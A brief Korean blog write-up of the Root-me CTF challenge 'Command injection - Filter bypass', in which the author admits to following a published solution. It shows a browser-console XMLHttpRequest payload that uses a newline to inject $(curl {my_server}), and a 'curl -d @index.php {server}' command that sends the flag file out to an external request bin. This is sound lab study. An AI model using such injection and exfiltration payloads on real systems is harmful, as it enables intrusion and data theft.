Post

Root-me Command injection Filter bypass (풀이 봄)

Command injection - Filter bypass (풀이 봄)



1
2
3
4
5
6
7
8
9
30 Points
Ping service v2
Author
sambecks,  20 September 2017

Statement
Find a vulnerability in this service and exploit it. Some protections were added.

The flag is on the index.php file.






Solution



풀이를 보니 new line을 이용하여 풀 수 있다고 한다.

chrome 개발자 도구를 이용해 console에서 보내주었다.


1
2
3
4
c = new XMLHttpRequest();
c.open('POST','http://challenge01.root-me.org/web-serveur/ch53/index.php', true);
c.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
c.send('ip=1.1.1.1;%0a$(curl {my_server})');


그러면 서버로 요청이 들어온 걸 알 수 있다.

서버는 드림핵 request bin을 이용하였고, post로 파일을 보내는 방법은 아래 주소에서 확인할 수 있다.
reqbin.com/req/c-dot4w5a2/curl-post-file

즉, POST로 파일을 전송할 때 curl -d @index.php {server}로 해주면 된다는 것이다.






This post is licensed under CC BY 4.0 by the author.